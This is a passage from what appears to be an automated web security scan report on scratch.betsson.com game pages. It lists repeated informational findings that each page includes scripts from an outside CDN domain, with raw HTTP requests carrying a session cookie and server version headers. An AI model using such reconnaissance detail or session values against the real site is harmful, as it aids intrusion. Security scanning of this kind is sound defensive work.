X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:56:31 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:56:31 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:56:32 GMT
Connection: close
Content-Length: 102613


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.69. https://scratch.betsson.com/en/Fantasy/Cash-Farm

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Fantasy/Cash-Farm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/Fantasy/Cash-Farm HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:51:59 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:51:59 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:51:59 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:51:59 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:51:58 GMT
Connection: close
Content-Length: 102716


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.70. https://scratch.betsson.com/en/Fantasy/Club-Pearl

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Fantasy/Club-Pearl

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js

Request

GET /en/Fantasy/Club-Pearl HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:53:28 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:53:28 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:53:28 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:53:28 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:53:27 GMT
Connection: close
Content-Length: 102695


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.71. https://scratch.betsson.com/en/Fantasy/Crazy-Cat

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Fantasy/Crazy-Cat

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js

Request

GET /en/Fantasy/Crazy-Cat HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:52:16 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:52:16 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:52:16 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:52:16 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:52:15 GMT
Connection: close
Content-Length: 102703


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.72. https://scratch.betsson.com/en/Fantasy/Dancing-Domino

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Fantasy/Dancing-Domino

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js

Request

GET /en/Fantasy/Dancing-Domino HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:51:44 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:51:44 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:51:44 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:51:44 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:51:43 GMT
Connection: close
Content-Length: 102711


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.73. https://scratch.betsson.com/en/Fantasy/Fast-Hands

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Fantasy/Fast-Hands

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js

Request

GET /en/Fantasy/Fast-Hands HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:52:07 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:52:07 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:52:07 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:52:07 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:52:06 GMT
Connection: close
Content-Length: 102720


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.74. https://scratch.betsson.com/en/Fantasy/Golden-Island

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Fantasy/Golden-Island

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js

Request

GET /en/Fantasy/Golden-Island HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:53:01 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:53:01 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:53:01 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:53:01 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:53:01 GMT
Connection: close
Content-Length: 102712


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.75. https://scratch.betsson.com/en/Fantasy/Knights-Battle

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Fantasy/Knights-Battle

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js

Request

GET /en/Fantasy/Knights-Battle HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:51:56 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:51:56 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:51:56 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:51:56 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:51:56 GMT
Connection: close
Content-Length: 102703


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.76. https://scratch.betsson.com/en/Fantasy/Love-Birds

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Fantasy/Love-Birds

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js

Request

GET /en/Fantasy/Love-Birds HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:51:50 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:51:50 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:51:50 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:51:50 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:51:50 GMT
Connection: close
Content-Length: 102711


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.77. https://scratch.betsson.com/en/Fantasy/Lucky-Diamonds

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Fantasy/Lucky-Diamonds

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js

Request

GET /en/Fantasy/Lucky-Diamonds HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:51:29 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:51:29 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:51:29 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:51:29 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:51:29 GMT
Connection: close
Content-Length: 102721


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.78. https://scratch.betsson.com/en/Fantasy/Master-Mix

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Fantasy/Master-Mix

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js

Request

GET /en/Fantasy/Master-Mix HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:52:18 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:52:18 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:52:18 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:52:18 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:52:18 GMT
Connection: close
Content-Length: 102703


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.79. https://scratch.betsson.com/en/Fantasy/Memory-Madness

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Fantasy/Memory-Madness

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js

Request

GET /en/Fantasy/Memory-Madness HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:53:01 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:53:01 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:53:01 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:53:01 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:53:01 GMT
Connection: close
Content-Length: 102695


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.80. https://scratch.betsson.com/en/Fantasy/Ocean-Pearl

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Fantasy/Ocean-Pearl

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js

Request

GET /en/Fantasy/Ocean-Pearl HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:51:27 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:51:27 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:51:27 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:51:27 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:51:27 GMT
Connection: close
Content-Length: 102703


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

